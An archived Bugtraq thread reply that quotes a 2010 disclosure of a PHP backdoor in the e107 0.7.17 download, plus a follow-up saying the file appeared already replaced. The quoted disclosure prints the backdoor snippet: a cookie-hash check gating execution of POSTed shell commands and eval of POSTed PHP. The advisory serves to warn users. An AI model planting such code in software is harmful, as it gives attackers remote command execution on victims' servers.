Bugtraq mailing list archives
Re: e107 latest download link is backdoored
From: "Valery Marchuk" <vulns () securitylab ru>
Date: Mon, 25 Jan 2010 20:07:10 +0200
I`ve just checked the archive. The latest version of the file class2.php was changed on 2010/01/21 03:57:43 and it does not contain the malicious code. It has been probably replaced already, or we are using different mirrors.
Valery Marchuk www.SecurityLab.ru----- Original Message ----- From: "Bogdan Calin" <bogdan () acunetix com>
To: <full-disclosure () lists grok org uk> Cc: <bugtraq () securityfocus com> Sent: Monday, January 25, 2010 12:58 PM Subject: e107 latest download link is backdoored
Hi guys, The latest version of e107, version 0.7.17 contains a PHP backdoor. http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip I've just downloaded this file and while looking through the code, I've found the following piece of code: file: class2.php, line: 1876 if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") { ... if(!empty($_POST['cmd'])){ $out = execute($_POST['cmd']); } elseif(!empty($_POST['php'])){ ob_start(); eval($_POST['php']); $out = ob_get_contents(); ob_end_clean(); } ... and so on. I've informed the e107 guys about this situation. For now, that link is not safe.Look at the file date, class2.php has been modified on 2010-01-23, 21:52:26-- Bogdan Calin - bogdan () acunetix com CTO Acunetix Ltd. - http://www.acunetix.comAcunetix Web Security Blog - http://www.acunetix.com/blog
Current thread:
- e107 latest download link is backdoored Bogdan Calin (Jan 25)
- Re: e107 latest download link is backdoored Chris Travers (Jan 25)
- Re: e107 latest download link is backdoored Valery Marchuk (Jan 25)
- Re: e107 latest download link is backdoored Carsten Eilers (Jan 26)
- Re: [Full-disclosure] e107 latest download link is backdoored David Sopas (Jan 26)
- Re: [Full-disclosure] e107 latest download link is backdoored Gregor Schneider (Jan 26)
- Re: [Full-disclosure] e107 latest download link is backdoored Fernando Augusto (Jan 26)
- Re: [Full-disclosure] e107 latest download link is backdoored Gregor Schneider (Jan 27)
- <Possible follow-ups>
- Re: Re: e107 latest download link is backdoored track (Jan 26)